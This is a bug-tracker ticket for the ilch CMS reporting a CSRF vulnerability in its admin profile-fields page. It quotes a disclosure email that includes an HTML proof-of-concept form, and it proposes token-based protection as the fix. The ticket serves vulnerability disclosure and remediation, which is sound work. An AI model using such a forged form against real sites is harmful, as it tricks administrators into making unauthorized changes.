Project

General

Profile

Fehler #194

CSRF Angreifbarkeit - admin.php?profilefields

Added by Große, Sebastian almost 5 years ago.

Status:
Neu
Priority:
Normal
Assignee:
-
Start date:
02/10/2015
Due date:
% Done:

0%

Estimated time:

Description

Ich habe folgende E-Mail erhalten.

http://demo.opensourcecms.com/ilch/admin.php?profilefields  

the above link is vulnerable to csrf vulnerability in which attacker can send one html file or ask victim to goto a link and a new vaue will be added over there 

how to resolve use some csrf protection link sending token with every request 

below is the html poc 

<html>

  <body>
    <form action="http://demo.opensourcecms.com/ilch/admin.php?profilefields" method="POST">
      <input type="hidden" name="sid" value="" />
      <input type="hidden" name="show" value="test" />
      <input type="hidden" name="func" value="1" />
      <input type="hidden" name="sub" value="Eintragen" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Kann durch die Verwendung von get/chk_antispam verhindert werden. Es sind ggf. auch noch andere Formulare oder Aktionen im Adminbereich zu prüfen.

Also available in: Atom PDF